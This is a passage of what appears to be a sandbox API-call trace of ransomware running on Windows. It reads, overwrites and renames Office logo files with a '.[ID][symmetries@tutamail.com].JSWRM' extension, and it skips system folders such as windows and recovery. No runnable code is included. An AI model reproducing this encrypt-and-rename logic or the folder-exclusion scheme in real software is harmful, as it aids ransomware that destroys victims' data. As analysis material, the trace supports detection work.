(in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x740, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x740, lpOverlapped=0x0) returned 1 [0133.647] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.647] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x740, lpOverlapped=0x0) returned 1 [0133.647] CloseHandle (hObject=0x238) returned 1 [0133.647] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\OutlookLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\outlooklogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.648] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.contrast-black_scale-100.png", cAlternateFileName="POWERP~3.PNG")) returned 1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2="windows") returned -1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2="recovery") returned -1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2="perflogs") returned 1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2="system volume information") returned -1 [0133.648] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-100.png", lpString2="msocache") returned 1 [0133.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0133.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-black_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0133.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-100.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.649] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2263) returned 1 [0133.649] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.650] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x8d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x8d0, lpOverlapped=0x0) returned 1 [0133.651] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.651] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x8d0, lpOverlapped=0x0) returned 1 [0133.651] CloseHandle (hObject=0x238) returned 1 [0133.651] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-100.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-100.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-100.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-100.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.652] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb02, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.contrast-black_scale-140.png", cAlternateFileName="POWERP~1.PNG")) returned 1 [0133.652] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2=".") returned 1 [0133.652] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2="..") returned 1 [0133.652] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2="...") returned 1 [0133.652] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2="windows") returned -1 [0133.652] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2="recovery") returned -1 [0133.653] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2="perflogs") returned 1 [0133.653] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2="documents and settings") returned 1 [0133.653] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0133.653] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2="system volume information") returned -1 [0133.653] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-140.png", lpString2="msocache") returned 1 [0133.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22d298, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0133.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-140.png", cchWideChar=41, lpMultiByteStr=0x22ce70, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-black_scale-140.png", lpUsedDefaultChar=0x0) returned 41 [0133.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.653] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.653] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.654] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2818) returned 1 [0133.654] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.654] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xb00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xb00, lpOverlapped=0x0) returned 1 [0133.655] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.655] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xb00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xb00, lpOverlapped=0x0) returned 1 [0133.656] CloseHandle (hObject=0x238) returned 1 [0133.656] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.657] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a79652b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd7d, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.contrast-black_scale-180.png", cAlternateFileName="POA3C2~1.PNG")) returned 1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2=".") returned 1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2="..") returned 1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2="...") returned 1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2="windows") returned -1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2="recovery") returned -1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2="perflogs") returned 1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2="documents and settings") returned 1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2="system volume information") returned -1 [0133.657] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-180.png", lpString2="msocache") returned 1 [0133.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22d260, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0133.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.657] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-180.png", cchWideChar=41, lpMultiByteStr=0x22d298, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-black_scale-180.png", lpUsedDefaultChar=0x0) returned 41 [0133.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.658] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.658] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.658] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3453) returned 1 [0133.658] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.658] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xd70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xd70, lpOverlapped=0x0) returned 1 [0133.664] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.664] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xd70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xd70, lpOverlapped=0x0) returned 1 [0133.664] CloseHandle (hObject=0x238) returned 1 [0133.664] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.668] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7bd, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.contrast-black_scale-80.png", cAlternateFileName="POB7FC~1.PNG")) returned 1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2=".") returned 1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2="..") returned 1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2="...") returned 1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2="windows") returned -1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2="recovery") returned -1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2="perflogs") returned 1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2="documents and settings") returned 1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2="system volume information") returned -1 [0133.668] lstrcmpiW (lpString1="PowerPntLogo.contrast-black_scale-80.png", lpString2="msocache") returned 1 [0133.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22d0d8, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0133.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0133.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-black_scale-80.png", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-black_scale-80.png", lpUsedDefaultChar=0x0) returned 40 [0133.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.668] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0133.669] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1981) returned 1 [0133.669] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.669] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7b0, lpOverlapped=0x0) returned 1 [0133.671] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0133.671] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7b0, lpOverlapped=0x0) returned 1 [0133.671] CloseHandle (hObject=0x238) returned 1 [0133.671] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-black_scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\powerpntlogo.contrast-black_scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0133.672] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7702aa, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7702aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7702aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8e1, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="PowerPntLogo.contrast-white_scale-100.png", cAlternateFileName="PO3D2C~1.PNG")) returned 1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2=".") returned 1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2="..") returned 1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2="...") returned 1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2="windows") returned -1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2="recovery") returned -1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2="perflogs") returned 1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2="documents and settings") returned 1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2="system volume information") returned -1 [0133.672] lstrcmpiW (lpString1="PowerPntLogo.contrast-white_scale-100.png", lpString2="msocache") returned 1 [0133.672] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22d0d8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0133.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0133.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPntLogo.contrast-white_scale-100.png", cchWideChar=41, lpMultiByteStr=0x22ce70, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPntLogo.contrast-white_scale-100.png", lpUsedDefaultChar=0x0) returned 41 [0133.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0133.673] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0133.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\PowerPntLogo.contrast-white_scale-100.png" (normalized: "c:\\program 